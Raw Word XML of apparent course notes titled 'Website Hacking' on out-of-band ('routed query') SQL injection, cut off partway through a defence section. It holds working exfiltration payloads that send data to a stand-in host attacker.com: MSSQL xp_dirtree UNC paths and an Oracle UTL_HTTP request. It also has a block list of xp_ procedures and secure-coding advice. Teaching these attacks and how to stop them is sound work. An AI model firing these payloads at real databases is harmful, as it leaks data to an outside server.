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E4CF" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00603141" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk219410473"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
      <w:r w:rsidRPr="00603141">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Website Hacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1BCED" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00603141" w:rsidRDefault="00D42D55" w:rsidP="00D42D55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1C8D1CD2" w14:textId="48B72165" w:rsidR="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55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>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F2014" w14:textId="40BBEB11" w:rsidR="00D42D55" w:rsidRPr="00F775F2" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:pStyle w:val="Heading1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 xml:space="preserve">Topic – </w:t>
      </w:r>
      <w:r w:rsidR="00F775F2" w:rsidRPr="00F775F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00F775F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>outed query.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="335615B7" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>routed query</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> is when a database is forced to send a request outside itself (DNS, SMB, HTTP, another DB server).</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>Attackers abuse this to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088BD5DD" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>• Confirm SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Extract data when no results are shown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Trigger callbacks to their own server</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Bypass firewalls and output restrictions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77984497" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">Instead of returning data on the webpage, the database </w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>routes the data outward</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C55BC" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="227B28EA">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC1D0F5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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Common real-world routed query methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A21AB" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. DNS-based exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A6EB8" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Database sends a DNS request containing stolen data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D265B44" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Example idea:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>password.attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3388120D" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>The attacker controls attacker.com and reads the DNS logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0629481B" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="69DD60A3">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BFDCF1" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. SMB / UNC path routing (very common in MSSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BFF09" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>SQL Server can access network paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC3F547" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">EXEC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> '\\attacker.com\share'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A58C1E" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Now embed data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD473F" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">EXEC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>master..</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> '\\'+(SELECT TOP 1 name FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>sys.databases</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>)+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>'.attacker.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>\share'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A30864" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>The database name is leaked through the DNS/SMB request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185A943" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="6CD13FED">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB4D60" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. HTTP routed queries (Oracle / MySQL / MSSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F943424" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Databases can make web requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A121DE" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Oracle example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D24DB" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:lastRenderedPageBreak/>
        <w:t>SELECT UTL_HTTP.REQUEST('http://attacker.com/?d=' || user) FROM dual;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229BABEB" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="328E6AD3">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F1F5A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💣</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Practical attack flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A029663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Find SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605033DF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Normal output blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE2DF07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Use routed query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D931AC3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Database connects to attacker server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F767132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Attacker reads logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE17A83" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>Data is extracted silently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25A3EC" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>This works even when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• No errors shown</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• No data printed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t xml:space="preserve">• Only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> responses exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E4E48" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="1CA4E0B8">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DDE6D1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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Why this is dangerous in real systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC9E6A" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>• Bypasses WAF output filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Leaks data without visible response</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Can pivot into internal networks</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Often ignored in firewall rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:br/>
        <w:t>• Turns the DB into an attack proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F863514" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Real breaches use this for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF21AC" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>Credential theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BABA26B" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>Internal service discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282C207" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>Cloud metadata access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A7A9B" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>Lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E7403" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="7C4DB1EE">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6255598D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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> mapping (what actually stops this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F59547B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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Disable dangerous DB features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210ADFDB" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AA110" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>', 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941A7C0" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD286D" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55"/>
    <w:p w14:paraId="07948F81" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>sp_configure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> 'Ole Automation Procedures', 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6951FA4A" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:lastRenderedPageBreak/>
        <w:t>RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FBCC17" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Block:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED154B7" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FABB975" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_fileexist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="79F6BA8E" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="095FDFF0" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="4BAFF56A">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EA186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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Block outbound traffic from DB servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38277962" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Firewall rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D686710" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>No DNS except internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946AF13" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>No SMB outbound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B732B5" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42D55">
        <w:t>No HTTP/HTTPS outbound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A213C8B" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>This alone kills most routed query attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C84D2" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="3866CA63">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="792074CE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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Parameterized queries (core fix)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E013D" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Python example (safe):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F26B7C" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>cursor.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712444C" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">    "SELECT * FROM users WHERE email = %s AND password = %s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2DFB2" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">    (email, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC5919" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1652FF16" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t>Never:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910A1DF" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve">query = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t>f"SELECT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D42D55">
        <w:t xml:space="preserve"> * FROM users WHERE email='{email}' AND password='{password}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EA84C" w14:textId="77777777" w:rsidR="00D42D55" w:rsidRPr="00D42D55" w:rsidRDefault="00D42D55" w:rsidP="00D42D55">
      <w:r w:rsidRPr="00D42D55">
        <w:pict w14:anchorId="5A6EFA80">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B65F7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✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00D42D55">
        <w:rPr>
          <w:b/>
